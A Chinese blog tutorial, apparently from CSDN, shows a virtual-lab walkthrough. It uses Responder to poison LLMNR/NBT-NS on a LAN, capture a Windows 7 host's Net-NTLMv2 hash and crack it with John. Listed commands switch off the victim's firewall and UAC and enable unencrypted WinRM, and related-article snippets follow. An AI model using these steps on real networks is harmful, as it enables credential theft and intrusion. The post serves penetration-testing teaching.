内网渗透-Responder捕获Win哈希

最新推荐文章于 2024-08-18 10:38:00 发布
最新推荐文章于 2024-08-18 10:38:00 发布
阅读量3.1k 收藏 6
点赞数 4
分类专栏: 内网渗透 文章标签: 安全 内网渗透
本文链接:https://blog.csdn.net/weixin_43221560/article/details/107757138
版权

作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途

Responder捕获Win哈希

实验环境

VM搭建的虚拟测试环境
1.被攻击win7主机192.168.1.130
2.kali 192.168.1.131
3.win7配置

netsh advfirewall set allprofiles state off
winrm quickconfig
winrm set winrm/config/service/auth @{Basic="true"}
winrm set winrm/config/service @{AllowUnencrypted="true"}
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
重启

Responder

responder 这个工具会回答发出的LLMNR和NBT-NS查询,诱使受害者主机提供Net-NTLM哈希。
该工具一般只针对SMB的文件服务器服务请求

安装Responder

Responder在kali中已经内置,但版本更新可能不及时,最好自己进行下载更新
先配置好生成工具等环境

apt-get install build-essential git python-dev

从github下载源码

git clone https://github.com/lagandx/Responder.git
cd Resopnder/
git pull

Responder参数

Resopnder有很多参数
-I 设置监听的网络接口,eth0
-f 收集NBT_NS或LLMNR的信息
-w 设置WPAD服务器

获取NTLMv2哈希

1.开始毒化,监听请求信息

./Responder.py -wfF -I eth0

在这里插入图片描述
此时kali已经毒化完成,并监听信息。
2.使用被攻击主机随意访问域内共享文件,或访问域内主机
在这里插入图片描述

时已经获取到了被攻击主机的哈希值
3.CTRL+C进行结束进程,使用./DumpHash.py导出捕获的哈希值

./DumpHash.py

在这里插入图片描述
此时生成两个文件,DumpNTLMv1.txt和DumpNTLMv2.txt。
4.破解hash密码
使用Hashcat或者john等密码破解工具进行破解

john DumpNTLMv2.txt

在这里插入图片描述
破解出用户名hacker,密码password1

XG小刚
关注
专栏目录
[渗透测试学习] Responder - HackTheBox
rev1ve的博客
01-11 437
问题:“page”参数的以下哪个值是利用本地文件包含(LFI)漏洞的示例:“french.html”、“//10.10.14.6/somefile”、“…/windows/system32/drivers/etc/hosts”、“minikatz.exe”问题:“page”参数的以下哪个值是利用远程文件包含(RFI)漏洞的示例:“french.html”、“//10.10.14.6/somefile”、“…问题:当使用IP地址访问web服务时,我们被重定向到的域是什么?问题: 管理员用户的密码是什么?
内网渗透之Responder攻防(上)1
08-08
内网渗透之Responder攻防(上)1
Responder 项目使用教程
最新发布
gitblog_00313的博客
08-18 393
Responder 项目使用教程 ResponderResponder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP an...
内网渗透之Responder演练(下)
xnxqwzy的博客
08-23 164
NTLM中继攻击已经被发现十多年了,要实现NTLM中继攻击,也需要先进行LLMNR/NBNS欺骗,这样,攻击机器就可以充当了中间人,本质上还是由于NTLM认证机制所导致的,且对于最新的NTLMv2认证任然有效,但这个过程并不是没有限制,对于工作组的机器来说,两台机器的密码需要一致才能成功,对于域用户来说,被欺骗用户(发起请求的用户)需要域管理员组里边的用户才可以,NTLM中继成功后的权限为被欺骗用户的权限。这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。
Hack The Box Starting Point 渗透测试入门靶场 TIER 1 - Responder
Start C的博客
04-19 1252
涉及到SMB,枚举,Apache和WinRM(WinRM是Windows Remote Managementd(win远程管理)的简称。基于Web服务管理(WS-Management)标准,使用80或443端口。这样我们就可以在对方有设置防火墙的情况下远程管理这台服务器) 先看一下旁边的Walkthough,看看本靶场的要求 本实验重点介绍如何利用 Windows 机器上提供的网页上的文件包含漏洞来收集运行 Web 服务器的用户的 NetNTLMv2 质询。我们将使用一个名为 Responder 的实用程
不利用系统漏洞拿shell,kali强大工具Responder
qq_39815966的博客
10-17 1888
这是一种不用通过漏洞利用来获取权限的一种方法,使用的是kali的一个工具,叫Responder,主要是通过监听网络,有人如果访问了虚假的共享文件地址,就会获得该系统登录口令的哈希值,然后再通过脚本进行hash爆破就可以获取口令,再通过ipc建立空连接获得系统权限。 我们的第一步当然是获取该工具喽,非常的简单,只要从github上下载即可, 当然首先你先需要安装一下python环境和git工具 # apt-get intall build-essential git python-dev 然后是直接从git
灰帽黑客(第五版):实验10-1 使用Responder获取口令
lmpwang的博客
08-25 283
宿主机Kali:192.168.43.209虚拟机VirtualBox:网络:桥接网络,使虚拟机和宿主机保持在一个网段系统:win10家庭版系统(初始系统使用virtualbox安装过程默认密码changeme!Responder
Windows 环境中使用 Responder 窃取 NTLMv2 哈希并利用
子曰小玖的博客
04-24 900
Responder工具 Responder下载地址:https://github.com/lgandx/Responder Responder工具可以污染LLMNR和NBT-NS请求。 首先假设连接到Windows活动目录环境(Windows Active directory),当网络上的设备尝试用LLMNR和NBT-NS请求来解析目的地机器时,Responder就会伪装成目的地机器。当受害...
Laravel开发-laravel-responder
08-27
**Laravel 开发与 Laravel Responder** 在 Laravel 开发中,构建高质量的 API 是一个重要的环节,这通常涉及到数据的格式化、响应处理以及错误管理等。`laravel-responder` 是一个专为 Laravel 设计的包,它将 ...
uMTP-Responder:用于GNULinux的轻量级USB媒体传输协议(MTP)响应程序守护程序
02-05
**uMTP-Responder简介** uMTP-Responder是一个针对GNULinux操作系统的轻量级USB媒体传输协议(MTP)响应程序守护进程。它的主要目的是实现与MTP设备(如智能手机、数码相机等)之间的文件传输。MTP是微软推出的一种...
ssdp-responder:适用于Linux的SSDP响应器,Windows中的InternetGatewayDevice图标
05-25
适用于Linux / UNIX的SSDP响应器 用于联网Linux和UNIX设备的简单服务发现协议守护程序(SSDP)。 在任何大小的设置中都有用,但更多地针对需要向Windows系统宣布自己的嵌入式系统。 ssdpd是一个独立的UNIX守护程序,...
Responder的使用
谢公子的博客
09-05 1441
Responder是一个LLMNR,NBT-NS和MDNS投毒者,它将回答特定的NBT-NS(NetBIOS名称服务)查询。
responder简单用法
qq_44881113的博客
09-08 1482
Responder is an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix Responder 是一款可以在局域网模拟各种服务器的内网渗透神器 其可以在局域网中进行 DNS 欺骗、LLMNR 欺骗等,实现对用户 NTLM 口令的探测以及 DNS 钓鱼 同时其还可以模拟包括 FTP、HTTP 在内的多
渗透师指南之Responder
热门推荐
大方子
06-30 1万+
总结与思考: 1. 利用Responder进行NTLMV2哈希的窃取 2. 使用Responder进行中继,攻击成功后进行代码执行 3. 使用Responder进行凭证/哈希破解 4. 使用Responder进行快速SMB扫描 5. 使用Responder配合MSF反弹shell 6. LLMNR/NBT-NS攻击的防御 概述: Responder是对渗透测试工作者来说一个很棒的工...
Responder
09-20 456
操作系统:Kali Linux 工具:responder,john,evil-winrm PS:输入以下命令解决靶场环境无法打开问题
使用Responder获取ntlmv2 hash
whojoe的博客
03-03 1384
使用Responder获取ntlmv2 hashResponder配置下载获取ntlmv2hash之后进行爆破获取ntlmv2使用hashcat爆破密码中继获得shell参考文章 Responder配置 下载 https://github.com/lgandx/Responder Responder工具可以污染LLMNR和NBT-NS请求。 在目录下的Responder.conf可以配置启用的模块 如果只需要获取ntlmv2hash使用默认配置即可,之后使用Hashcat进行暴力破解 如果要使用ntlm中
最新kali之responder
vanony的博客
07-09 732
选项: --version 显示程序的版本号并退出 -h, --help 显示此帮助消息并退出 -A, --analyze 分析模式。 此选项使您无需响应即可查看NBT-NS,BROWSER,LLMNR请求。 -I eth0, --interface=eth0 要使用的网络接口,可以将“ ALL”用作所有接口的通配符 -i 10.0.0.21, --ip=10.0.0.21 要使用的本地IP(仅适用于OSX) -e 10.0.0.22, --externalip=10.0.0.22 使
Responder: 网络嗅探工具
gitblog_00093的博客
03-18 475
Responder: 网络嗅探工具 ResponderResponder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP a...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值